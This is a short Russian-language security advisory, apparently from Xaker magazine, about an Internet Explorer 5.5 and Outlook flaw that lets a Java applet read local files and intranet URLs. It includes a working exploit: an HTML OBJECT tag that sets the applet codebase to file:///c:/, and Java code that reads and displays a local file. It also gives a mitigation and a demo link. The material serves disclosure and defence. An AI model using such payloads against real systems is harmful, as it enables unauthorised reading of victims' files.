Хакер #305. Многошаговые SQL-инъекции
Детали:
В IE 5.5/Outlook/Outlook Express обнаружена уязвимость, позволяющая читать локальные файлы, произвольные интранет (это не опечатка 🙂 URL'ы и получать структуры локальных директорий после посещения определенной странички или чтения HTML-сообщения.
Причина очередного бага в мелкомягком софте - невозможность определить произвольный апплет, загруженный из <OBJECT> tag и jar-файла. Апплеты могут читать URL'ы из "код-базы" и связываться с хостами той же самой "код-базы".
Код устанавливает "код-базу" апплетов в file:///c:/. Проблема не в Java, и, возможно, не в Microsoft's VM, скорее всего, проблема в том, как "код-база" устанавливается IE.
Exploit:
---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------
--------gjavacodebase.java-------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
---------------------------------------------------------------------
Решение:
Отключите Java ;).
Демонстрация:
http://www.guninski.com/javacodebase1.html